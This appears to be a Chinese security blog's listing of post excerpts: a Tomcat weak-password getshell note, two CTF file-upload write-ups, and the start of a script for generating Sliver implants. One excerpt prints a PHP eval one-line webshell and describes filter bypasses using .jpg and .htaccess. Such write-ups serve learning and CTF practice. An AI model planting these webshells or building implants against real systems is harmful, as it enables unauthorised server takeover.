• 2023-09-06Tomcat7+ 弱口令 && 后台getshell漏洞
    Tomcat7+弱口令&&后台getshell漏洞环境说明Tomcat支持后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。Tomcat7+权限分为:manger(后台管理)manger-gui拥有html页面权限manger-status拥有查看status的权限mager-jmx拥有jmx权限
  • 2023-08-14[UUCTF 2022 新生赛]ez_upload
    [UUCTF2022新生赛]ez_upload题目来源:nssctf题目类型:web涉及考点:文件上传1.题目给了一个上传入口,直接传muma.php试试一句话木马为<scriptlanguage="php">eval($_POST['r00ts']);</script>回显如下:换成muma.jpg试试:上传成功,再上传.htaccess文件进行解析,但是上传失
  • 2023-08-12[NISACTF 2022]bingdundun~
    [NISACTF2022]bingdundun~题目来源:nssctf题目类型:web涉及考点:文件上传1.题目给了一个点击按钮,进去之后是上传入口还是选择之前的muma.jpg上传:上传成功,我们再利用bp抓包修改成muma.php试试上传失败了,我们回去看看有没有啥提示,在源代码中发现:额,好像没什么用
  • 2023-07-19sliver生成木马.sh
    生成sliver木马多个步骤合成一个sh#!/bin/bash#date:20230222host_ip=$1WORK_DIR=/opt/workrm-rf/root/.sliver-client/cd${WORK_DIR}/sliverrm-rfadjectives.txtbas_192.0.2.1.cfgmuma_x*nouns.txtsliver.dbversionconfigs/database.jsonconfigs/htt